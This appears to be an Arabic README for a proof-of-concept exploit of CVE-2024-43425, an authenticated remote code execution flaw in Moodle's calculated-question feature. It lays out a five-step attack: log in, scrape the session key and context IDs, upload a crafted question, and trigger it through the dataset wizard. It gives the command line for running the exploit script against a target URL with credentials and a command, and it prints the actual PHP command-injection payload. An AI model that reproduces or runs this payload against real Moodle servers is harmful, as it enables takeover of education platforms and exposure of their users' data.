
إثبات مفهوم لثغرة CVE-2024-43425، تظهر تنفيذ تعليمات برمجية عن بعد عبر المصادقة في موودل من خلال تحميل أسئلة محسوبة خبيثة.
نظرة عامة على CVE معرف CVE: CVE-2024-43425
الوصف: يسمح Moodle لمستخدم مدرس مصادق عليه برفع سؤال محسوب خبيث عبر واجهة تحرير الاختبارات. التأثير: تنفيذ تعليمات برمجية عن بُعد (RCE) السبب: معالجة غير صحيحة للحمولات الرياضية داخل الأسئلة المحسوبة، مما يؤدي إلى حقن أوامر عبر معالج مجموعة البيانات.
##المتطلبات:
بيانات اعتماد صالحة لتسجيل الدخول الوصول إلى واجهة تحرير الاختبارات (عادةً دور المعلم أو المشرف) معرف cmid معروف (معرف وحدة الاختبار) و courseid
##يقوم هذا البرنامج النصي بهجوم من 5 خطوات:
| الخطوة | الوصف |
|---|---|
| 1️ | جلب رمز تسجيل الدخول (logintoken) |
| 2️ | تسجيل الدخول وإنشاء جلسة Moodle صالحة |
| 3️ | استخراج sesskey و ctxid و category من صفحة تحرير الاختبار |
| 4️ | رفع سؤال محسوب معد خصيصًا مع حمولة RCE |
| 5️ | تفعيل الحمولة عبر صفحة معالج مجموعة البيانات |
##تعليمات الاستخدام
المتطلبات: Python 3 مكتبات Python: requests, bs4 (BeautifulSoup)
pip3 install requests bs4
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
##الحمولة المستخدمة:
answer[0] = "(1)->{system($_GET[chr(97)])}"